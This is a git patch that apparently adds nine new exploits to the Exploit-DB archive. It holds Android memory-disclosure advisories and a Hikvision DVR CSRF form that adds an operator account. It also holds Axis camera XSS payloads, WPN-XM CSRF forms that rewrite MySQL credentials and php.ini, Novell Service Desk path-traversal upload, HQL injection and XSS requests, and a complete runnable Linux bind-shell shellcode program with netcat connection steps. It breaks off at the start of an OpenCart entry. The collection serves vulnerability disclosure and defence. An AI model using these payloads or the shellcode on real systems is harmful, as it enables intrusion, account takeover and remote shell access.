From 921bb6b2e3ac5e86397453e3bf5f43ac41c38980 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 12 Apr 2016 05:04:12 +0000
Subject: [PATCH] DB: 2016-04-12

9 new exploits

Hikvision Digital Video Recorder - Cross-Site Request Forgery
WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery
OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution
CAM UnZip 5.1 - Archive Path Traversal
Axis Network Cameras - Multiple Vulnerabilities
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities
---
 files.csv                              |   9 ++
 platforms/android/dos/39685.txt        |  46 +++++++
 platforms/android/dos/39686.txt        |  90 +++++++++++++
 platforms/hardware/webapps/39677.html  |  53 ++++++++
 platforms/hardware/webapps/39683.txt   | 138 ++++++++++++++++++++
 platforms/jsp/webapps/39687.txt        | 172 +++++++++++++++++++++++++
 platforms/lin_x86-64/shellcode/39684.c |  88 +++++++++++++
 platforms/php/webapps/39678.txt        | 113 ++++++++++++++++
 platforms/php/webapps/39679.txt        |  48 +++++++
 platforms/windows/local/39680.txt      | 103 +++++++++++++++
 10 files changed, 860 insertions(+)
 create mode 100755 platforms/android/dos/39685.txt
 create mode 100755 platforms/android/dos/39686.txt
 create mode 100755 platforms/hardware/webapps/39677.html
 create mode 100755 platforms/hardware/webapps/39683.txt
 create mode 100755 platforms/jsp/webapps/39687.txt
 create mode 100755 platforms/lin_x86-64/shellcode/39684.c
 create mode 100755 platforms/php/webapps/39678.txt
 create mode 100755 platforms/php/webapps/39679.txt
 create mode 100755 platforms/windows/local/39680.txt

diff --git a/files.csv b/files.csv
index a4b0b5c1c..daa431661 100755
--- a/files.csv
+++ b/files.csv
@@ -35898,3 +35898,12 @@ id,file,description,date,author,platform,type,port
 39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0
 39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443
+39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80
+39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
+39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
+39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
+39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
+39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
+39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
+39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
+39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
diff --git a/platforms/android/dos/39685.txt b/platforms/android/dos/39685.txt
new file mode 100755
index 000000000..4b3d05bd3
--- /dev/null
+++ b/platforms/android/dos/39685.txt
@@ -0,0 +1,46 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=711
+
+Android: Information Disclosure in IOMX getConfig/getParameter
+Platform: Verified on google/razor/flo:6.0.1/MMB29O/2459718:user/release-keys
+Class: Information Disclosure
+
+Summary:
+The GET_CONFIG and GET_PARAMETER calls on IOMX are vulnerable to an information disclosure of uninitialized heap memory. This could be used by an attacker to break ASLR in the media server process by reading out heap memory which contains useful address information.
+
+Description:
+The relevant code in frameworks/av/media/libmedia/IOMX.cpp is:
+
+node_id node = (node_id)data.readInt32();
+OMX_INDEXTYPE index = static_cast<OMX_INDEXTYPE>(data.readInt32());
+
+size_t size = data.readInt64();
+
+void *params = malloc(size);
+data.read(params, size); <- Read in the buffer from the parcel to initialize
+
+
+// SNIP - getParameter etc.
+
+if ((code == GET_PARAMETER || code == GET_CONFIG) && err == OK) {
+  reply->write(params, size); <- Write back entire buffer to caller
+}
+
+The vulnerability stems from the fact that Parcel::read(void* outData, size_t len) fails quickly if it doesn’t have sufficient data in the parcel to satisfy the request leaving the outData buffer untouched. As long as the call to getParameter or getConfig succeed then the entire, mostly uninitialized buffer will be returned. For example if the parameter is only 8 bytes in size but the caller passes a size field of 128 bytes (but doesn’t write those 128 bytes into the parcel) then the 120 bytes following in the heap will be returned uninitialized. 
+
+Arguably there’s also a potential NULL pointer dereference here depending on the implementation as the call to malloc can fail with an arbitrary size value. But I think later functions handle the NULL case. 
+I’d suggest that the result of data.read should be checked to ensure all the data has been read correctly.
+
+Proof of Concept:
+I’ve provided a PoC which exploits the issue and prints a 64 byte buffer (with 56 bytes uninitialized) to logcat. It uses the OMX.qcom.video.decoder.mpeg4 component. I’ve only tested this on a Nexus 5 and Nexus 7 devices, but I’m guessing that decoder should be everywhere. You should be able to create default Android Studio project and call OMXInfoDisclosurePoC.testOMX
+from the Main Activity. When run you should see a line in logcat similar to:
+
+E/MyClass: allocateNode Error: 0
+E/MyClass: Allocate Node: 42
+E/MyClass: Result: 040000000101000XXXXXXXXXX
+
+Where XXXXXX should be uninitialized memory from the heap.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39685.zip
+
diff --git a/platforms/android/dos/39686.txt b/platforms/android/dos/39686.txt
new file mode 100755
index 000000000..05321e070
--- /dev/null
+++ b/platforms/android/dos/39686.txt
@@ -0,0 +1,90 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=706
+
+Android: IMemory Native Interface is insecure for IPC use
+Platform: Tested on Android 6.0.1 January patches
+Class: Elevation of Privilege
+
+Summary:
+The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media services can be tricked to return arbitrary memory locations leading to information disclosure or memory corruption.
+
+Description:
+The IMemory interface allows the passing of shared memory across the Binder IPC channel on Android. The interface supports a single remote call, GET_MEMORY which requests a separate IMemoryHeap interface along with an offset value and size for the shared memory buffer. The IMemoryHeap interface in turn supports a HEAP_ID call which marshals across a FileDescriptor, size, flags and an offset. This is passed to mmap to map the shared memory into the current process.
+
+The underlying vulnerability is the sizes in IMemory and IMemoryHeap are not checked relative to one another, and nor is the offset in IMemory checked against the size of IMemoryHeap. This allows a local process to craft fake IMemory and IMemoryHeap objects such that they lie about their values and either cause information disclosure or memory corruption.
+
+To understand this let’s look at how the pointer to the shared buffer is extracted from IMemory::pointer:
+
+void* IMemory::pointer() const {
+    ssize_t offset;
+    sp<IMemoryHeap> heap = getMemory(&offset);
+    void* const base = heap!=0 ? heap->base() : MAP_FAILED;
+    if (base == MAP_FAILED)
+        return 0;
+    return static_cast<char*>(base) + offset; <- No check on IMemoryHeap size
+}
+
+Maybe we check sizes in getMemory() ?
+
+sp<IMemoryHeap> BpMemory::getMemory(ssize_t* offset, size_t* size) const
+{
+    if (mHeap == 0) {
+        Parcel data, reply;
+        data.writeInterfaceToken(IMemory::getInterfaceDescriptor());
+        if (remote()->transact(GET_MEMORY, data, &reply) == NO_ERROR) {
+            sp<IBinder> heap = reply.readStrongBinder();
+            ssize_t o = reply.readInt32();
+            size_t s = reply.readInt32(); <- No check.
+            if (heap != 0) {
+                mHeap = interface_cast<IMemoryHeap>(heap);
+                if (mHeap != 0) {
+                    mOffset = o;
+                    mSize = s;
+                }
+            }
+        }
+    }
+    if (offset) *offset = mOffset;
+    if (size) *size = mSize;
+    return mHeap;
+}
+
+Nope, as we can see, no check is made of IMemoryHeap’s size, so you could specify a mapped file smaller than offset and create a pointer out of bounds. Of course if IMemoryHeap is invalid then the mmap process will return MAP_FAILED which will end up as NULL after the call to pointer(). 
+
+So how can this be abused? Any IPC service which calls pointer() can be tricked into accessing an arbitrary location, either a relative offset to the file mapped or NULL. For example look at ICrypto::onTransact with the DECRYPT operation. It checks that the offset is within the total size (this has been exploited before) with:
+
+} else if (totalSize > sharedBuffer->size()) {
+  result = -EINVAL;
+} else if ((size_t)offset > sharedBuffer->size() - totalSize) {
+  result = -EINVAL;
+
+The size is the value returned through IMemory, and not the actual mapped size from IMemoryHeap so in this case offset can be arbitrary. With the right plugin (such as the clearkey plugin) we can get this to read arbitrary memory. Even more so as there’s no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL. Setting size to 0xFFFFFFFF means we can read any memory location from 0 to 0xFFFFFFFF. 
+
+This can be turned into an arbitrary write as long as you can pass an arbitrary IMemory to another service. For example the BnCameraRecordingProxy::onTransact in frameworks/av/camera/ICameraRecordingProxy.cpp does the following for onReleaseRecordingFrame
+
+
+case RELEASE_RECORDING_FRAME: {
+            ALOGV("RELEASE_RECORDING_FRAME");
+            CHECK_INTERFACE(ICameraRecordingProxy, data, reply);
+            sp<IMemory> mem = interface_cast<IMemory>(data.readStrongBinder());
+
+            if (CameraUtils::isNativeHandleMetadata(mem)) {
+                VideoNativeHandleMetadata *metadata =
+                        (VideoNativeHandleMetadata*)(mem->pointer());
+                metadata->pHandle = data.readNativeHandle();
+
+                // releaseRecordingFrame will be responsble to close the native handle.
+            }
+            releaseRecordingFrame(mem);
+
+            return NO_ERROR;
+        } break;
+
+As you can coerce the pointer value, as long as the first 4 bytes make the integer 3 the next 4 bytes will be overwritten by the native handle value which can be controlled. 
+
+Proof of Concept:
+I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just SIG_SEGV on reading an arbitrary location (in this case 1GiB relative to the mapped memory). If it succeeds then that’s good as well as it shouldn't succeed. You should be able to create default Android Studio project and replace the MainActivity with the provided Java file. When run it should cause media server to crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39686.zip
+
diff --git a/platforms/hardware/webapps/39677.html b/platforms/hardware/webapps/39677.html
new file mode 100755
index 000000000..2a7219e2e
--- /dev/null
+++ b/platforms/hardware/webapps/39677.html
@@ -0,0 +1,53 @@
+<!--
+Hikvision Digital Video Recorder Cross-Site Request Forgery
+
+
+Vendor: Hikvision Digital Technology Co., Ltd
+Product web page: http://www.hikvision.com
+Affected version: LV-D2104CS
+                  DS-7316HFI-ST
+                  DS-7216HVI-SV/A
+                  DS-7208HVI-SH
+                  DS-7204HVI-SH
+
+Summary: Hikvision is the global leader of video surveillance
+products and solutions, manufactures a wide range of top-quality,
+reliable, and professional solutions.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Hikvision-Webs
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5315
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php
+
+Vendor: http://overseas.hikvision.com/europe/list01_435.html
+
+
+13.01.2016
+
+--
+
+
+CSRF Add Operator:
+------------------
+-->
+
+<html>
+  <body>
+    <form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
+      <input type="hidden" name="<&#63;xml&#32;version" value="&apos;1&#46;0&apos;&#32;encoding&#61;&apos;utf&#45;8&apos;&#63;><User><id>3<&#47;id><userName>tes2t<&#47;userName><password>test2<&#47;password><Extensions><bondIp><ipAddress>0&#46;0&#46;0&#46;0<&#47;ipAddress><&#47;bondIp><attribute><inherent>true<&#47;inherent><&#47;attribute><&#47;Extensions><&#47;User>" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
diff --git a/platforms/hardware/webapps/39683.txt b/platforms/hardware/webapps/39683.txt
new file mode 100755
index 000000000..4d27be4f8
--- /dev/null
+++ b/platforms/hardware/webapps/39683.txt
@@ -0,0 +1,138 @@
+                         _ _ _       _
+                        | | | |     | |
+  ___  _ ____      _____| | | | __ _| |__  ___
+ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|   6079 Smith W
+| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \   doubleplusungood
+ \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/   owning some telescreens...
+
+
+ Security Adivisory
+    2016-04-09
+                www.orwelllabs.com
+                  twt:@orwelllabs
+
+
+
+
+
+I. ADVISORY INFORMATION
+-----------------------
+Title: Axis Network Cameras Multiple Cross-site scripting
+Vendor: Axis Communications
+Class: Improper Input Validation [CWE-20]
+CVE Name: CVE-2015-8256
+Remotely Exploitable: Yes
+Locally Exploitable: No
+OLSA-ID: OLSA-2015-8256
+Adivisory URL:
+http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
+
+
+II. Background
+--------------
+Axis is the market leader in network video, invented the world’s first
+network camera back in 1996 and we’ve been innovators in video surveillance
+ever since. Axis network video products are installed in public places and
+areas such as retail chains, airports, trains, motorways, universities,
+prisons, casinos and banks.
+
+III. vulnerability
+------------------
+AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
+scripting vulnerability.
+
+IV. technical details
+---------------------
+These attack vectors allow you to execute an arbitrary javascript code in
+the user browser (session) with this steps:
+
+# 1 Attacker injects a javascript payload in the vulnerable page:
+http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
+type="text/javascript>prompt("AXIS_PASSWORD:")</script>
+
+This will create a entry in the genneral log file (/var/log/messages) So,
+when the user is viewing the log 'system options' -> 'support' -> 'Logs &
+Reports':
+
+http://{axishost}/axis-cgi/admin/systemlog.cgi?id
+will be displayed a prompt for the password of the current user
+('AXIS_PASSWORD').
+
+However, due to CSRF presented is even possible to perform all actions
+already presented: create, edit and remove users and applications, etc. For
+example, to delete an application "axis_update" via SXSS:
+
+http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
+axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
+
+* A reflected cross-site scripting affects all models of AXIS devices on
+the same parameter:
+http://
+{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
+
+# Other Vectors
+http://
+{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
+
+http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
+onerror=alert(7) /><!--
+http://
+{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
+
+http://
+{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
+
+http://
+{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
+
+# SCRIPTPATHS:
+
+{HTMLROOT}/showReport.shtml
+{HTMLROOT}/config.shtml
+{HTMLROOT}/incl/top_incl.shtml
+{HTMLROOT}/incl/popup_header.shtml
+{HTMLROOT}/incl/page_header.shtml
+{HTMLROOT}/incl/top_incl_popup.shtml
+{HTMLROOT}/viewAreas.shtml
+{HTMLROOT}/vmd.shtml
+{HTMLROOT}/custom_whiteBalance.shtml
+{HTMLROOT}/playWindow.shtml
+{HTMLROOT}/incl/ptz_incl.shtml
+{HTMLROOT}/view.shtml
+{HTMLROOT}/streampreview.shtml
+
+And many, many others...
+
+V. Impact
+---------
+allows to run arbitrary code on a victim's browser and computer if combined
+with another flaws in the same devices.
+
+VI. Affected products
+---------------------
+Multiple Axis Network products.
+
+VII. solution
+-------------
+It was not provided any solution to the problem.
+
+VIII. Credits
+-------------
+The vulnerability has been discovered by SmithW from OrwellLabs
+
+IX. Legal Notices
+-----------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise. I accept no
+responsibility for any damage caused by the use or misuse of this
+information.
+
+X. Vendor solutions and workarounds
+-----------------------------------
+There was no response from the vendor.
+
+
+About Orwelllabs
+++++++++++++++++
+Orwelllabs is a (doubleplusungood) security research lab interested in embedded
+device & webapp hacking.
diff --git a/platforms/jsp/webapps/39687.txt b/platforms/jsp/webapps/39687.txt
new file mode 100755
index 000000000..78f555bcf
--- /dev/null
+++ b/platforms/jsp/webapps/39687.txt
@@ -0,0 +1,172 @@
+>> Multiple vulnerabilities in Novell Service Desk 7.1.0, 7.0.3 and 6.5
+>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
+=================================================================================
+Disclosure: 30/03/2016 / Last updated: 10/04/2016
+
+>> Background on the affected products:
+"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
+
+
+>> Summary:
+Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk". 
+Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
+
+
+>> Technical details:
+#1 
+Vulnerability: Arbitrary file upload via directory traversal (leading to remote code execution)
+CVE-2016-1593
+Constraints: Administrator account needed
+Affected versions: 
+- NSD 7.1.0
+- NSD 7.0.3
+- NSD 6.5
+- Possibly earlier versions
+
+The User -> Customers -> Import function allows an administrator to upload files. The path specified in the filename parameter can be traversed using ../ characters and upload a JSP file to the Tomcat directory.
+
+The default path to be traversed is /LiveTime/Uploads/ on the Novell Service Desk Virtual Appliance Demo.
+
+POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.53.19.0.2.7.0.3.0.0.1 HTTP/1.1
+Content-Type: multipart/form-data; boundary=---------------------------2477470717121
+Content-Length: 533
+
+-----------------------------2477470717121
+Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
+Content-Type: application/octet-stream
+
+<HTML>
+ <HEAD>
+  <TITLE>Hello World</TITLE>
+ </HEAD>
+ <BODY>
+  <H1>Hello World</H1>
+  Today is: <%= new java.util.Date().toString() %>
+ </BODY>
+</HTML>
+-----------------------------2477470717121
+Content-Disposition: form-data; name="ButtonUpload"
+
+Upload
+-----------------------------2477470717121--
+
+
+#2 
+Vulnerability: Information disclosure (Download System logs as any authenticated user - even unprivileged customers)
+CVE-2016-1594
+Constraints: User / client account needed
+Affected versions: 
+- NSD 7.0.3
+- NSD 6.5
+- Possibly earlier versions
+
+GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadLogFiles
+Contains the full error log, license and system information (operating system, java version, database, etc).
+
+
+#3
+Vulnerability: Information disclosure (Download any attachment from any client as an authenticated user - even unprivileged customers)
+CVE-2016-1594
+Constraints: User / client account needed
+Affected versions: 
+- NSD 7.1.0
+- NSD 7.0.3
+- NSD 6.5
+- Possibly earlier versions
+
+GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=ItemTypeAttach
+
+Possible entityNames are:
+KbaAttachment
+ServiceAttachment
+IncidentAttachment
+ItemAttach
+ProjectAttachment
+GroupAttachment
+ContractAttachment
+ItemTypeAttach
+
+Cycling through all attachmentId numbers will yield all attachments for each entityName.
+
+
+#4
+Vulnerability: Hibernate Query Language (HQL) injection
+CVE-2016-1595
+Constraints: User / client account needed
+Affected versions: 
+- NSD 7.1.0
+- NSD 7.0.3
+- NSD 6.5
+- Possibly earlier versions
+
+GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
+
+Input is passed directly to Hibernate (line 125 of DownloadAction.class):
+        List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
+
+hasEn is entityName (string) and hasId is attachmentId (integer)
+
+
+#5
+Vulnerability: Stored Cross Site Scripting (XSS)
+CVE-2016-1596
+Constraints: User / client account needed
+Affected versions: 
+- NSD 7.1.0
+- NSD 7.0.3
+- NSD 6.5
+- Possibly earlier versions
+
+Several sections of the web application are vulnerable to stored cross site scripting. This includes the administrator portal (when logged in as an administrator, technician, manager or other administrative user), the end user portal (when logged in as a normal end user) and the forums. The vulnerabilities below are just examples as the vulnerability is present in many different pages.
+
+a)
+In the customer portal, clicking the user name will allow you to edit your display name.
+The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
+Example:
+tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
+
+This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
+
+b)
+In the Forums the content section is vulnerable when creating a new topic.
+The affected parameter is ta_selectedTopicContent.
+Example:
+tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
+
+The alert box will pop up when you view the topic.
+
+c)
+In User -> Organizational Units, the name parameter is vulnerable (tf_orgUnitName) when you are creating a new Organizational Unit.
+Example:
+POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
+
+-----------------------------3162880314525
+Content-Disposition: form-data; name="tf_orgUnitName"
+
+"><script>alert(1)</script>
+
+The alert box will pop up when you view the Organizational Units page and possibly in other pages.
+
+d)
+In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
+Example:
+tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
+
+Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
+
+
+>> Fix: 
+#1, #3, #4 and 5# - Upgrade to version 7.2.0
+#2 - Upgrade to version 7.1.0
+
+
+>> References:
+[1] https://www.novell.com/support/kb/doc.php?id=7017428
+[2] https://www.novell.com/support/kb/doc.php?id=7017429
+[3] https://www.novell.com/support/kb/doc.php?id=7017431
+[4] https://www.novell.com/support/kb/doc.php?id=7017430
+
+================
+Agile Information Security Limited
+http://www.agileinfosec.co.uk/
+>> Enabling secure digital business >>
\ No newline at end of file
diff --git a/platforms/lin_x86-64/shellcode/39684.c b/platforms/lin_x86-64/shellcode/39684.c
new file mode 100755
index 000000000..29b41ff83
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39684.c
@@ -0,0 +1,88 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+  400080:   99                      cdq    
+  400081:   6a 29                   push   0x29
+  400083:   58                      pop    rax
+  400084:   6a 01                   push   0x1
+  400086:   5e                      pop    rsi
+  400087:   6a 02                   push   0x2
+  400089:   5f                      pop    rdi
+  40008a:   0f 05                   syscall 
+  40008c:   48 97                   xchg   rdi,rax
+  40008e:   6a 02                   push   0x2
+  400090:   66 c7 44 24 02 15 e0    mov    WORD PTR [rsp+0x2],0xe015
+  400097:   54                      push   rsp
+  400098:   5e                      pop    rsi
+  400099:   52                      push   rdx
+  40009a:   6a 10                   push   0x10
+  40009c:   5a                      pop    rdx
+  40009d:   6a 31                   push   0x31
+  40009f:   58                      pop    rax
+  4000a0:   0f 05                   syscall 
+  4000a2:   50                      push   rax
+  4000a3:   5e                      pop    rsi
+  4000a4:   6a 32                   push   0x32
+  4000a6:   58                      pop    rax
+  4000a7:   0f 05                   syscall 
+  4000a9:   6a 2b                   push   0x2b
+  4000ab:   58                      pop    rax
+  4000ac:   0f 05                   syscall 
+  4000ae:   48 97                   xchg   rdi,rax
+  4000b0:   6a 03                   push   0x3
+  4000b2:   5e                      pop    rsi
+  4000b3:   48 ff ce                dec    rsi
+  4000b6:   6a 21                   push   0x21
+  4000b8:   58                      pop    rax
+  4000b9:   0f 05                   syscall 
+  4000bb:   75 f6                   jne    0x4000b3
+  4000bd:   99                      cdq    
+  4000be:   52                      push   rdx
+  4000bf:   48 b9 2f 62 69 6e 2f    movabs rcx,0x68732f2f6e69622f
+  4000c6:   2f 73 68 
+  4000c9:   51                      push   rcx
+  4000ca:   54                      push   rsp
+  4000cb:   5f                      pop    rdi
+  4000cc:   6a 3b                   push   0x3b
+  4000ce:   58                      pop    rax
+  4000cf:   0f 05                   syscall 
+
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o bind_shell bind_shell.c
+$ execstack -s sh_shell
+$ ./sh_shell
+
+How to Connect
+
+$ nc <HOST IP ADDRESS> 5600
+
+Eg:
+
+$ nc 127.0.0.1 5600
+
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05";
+void main(int argc, char **argv)
+{
+	int (*func)();
+	func = (int (*)()) sh;
+	(int)(*func)();
+}
diff --git a/platforms/php/webapps/39678.txt b/platforms/php/webapps/39678.txt
new file mode 100755
index 000000000..1a5f887db
--- /dev/null
+++ b/platforms/php/webapps/39678.txt
@@ -0,0 +1,113 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
+
+
+Vendor:
+===========
+wpn-xm.org
+
+
+Product:
+==============================================
+WPN-XM Serverstack for Windows - Version 0.8.6
+
+WPN-XM is a free and open-source web server solution stack for professional
+PHP development on the Windows platform.
+
+
+Vulnerability Type:
+================================
+CSRF - MySQL / PHP.INI Hijacking
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
+attackers to compromise an authenticated user if they visit
+a malicious webpage or click an attacker supplied link. Attackers can
+modify the 'PHP.INI' file to change arbitrary PHPs settings
+like enable 'allow_url_include' or changing the default MySQL username &
+password settings etc...
+
+
+Exploit code(s):
+===============
+
+
+1) Hijack MySQL Account Default Settings
+
+
+<iframe name="ifrm" width="600" height="700" name="hidden-form"></iframe>
+
+
+<form target="ifrm" id="CSRF-MySQL-Username" method="post" action="
+http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
+">
+<input type="hidden" name="page" value="config">
+<input type="hidden" name="action" value="update-phpini-setting">
+<input type="hidden" name="directive" value="mysql.default_user" />
+<input type="hidden" name="value" value="hyp3rlinx" />
+<script>document.getElementById('CSRF-MySQL-Username').submit()</script>
+</form>
+
+<form target="ifrm" id="CSRF-MySQL-PWD" method="post" action="
+http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
+">
+<input type="hidden" name="page" value="config">
+<input type="hidden" name="action" value="update-phpini-setting">
+<input type="hidden" name="directive" value="mysql.default_password">
+<input type="hidden" name="value" value="PWNED!" />
+<script>document.getElementById('CSRF-MySQL-PWD').submit()</script>
+</form>
+
+
+2)  Hijack PHP.INI Settings
+
+<form id="CSRF-PHP-INI" method="post" action="
+http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
+">
+<input type="hidden" name="directive" value="allow_url_include" />
+<input type="hidden" name="value" value="On" />
+<script>document.getElementById('CSRF-PHP-INI').submit()</script>
+</form>
+
+
+
+Disclosure Timeline:
+=====================================
+Vendor Notification: No Reply
+April 9, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+================
+Medium
+
+
+=================================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx
diff --git a/platforms/php/webapps/39679.txt b/platforms/php/webapps/39679.txt
new file mode 100755
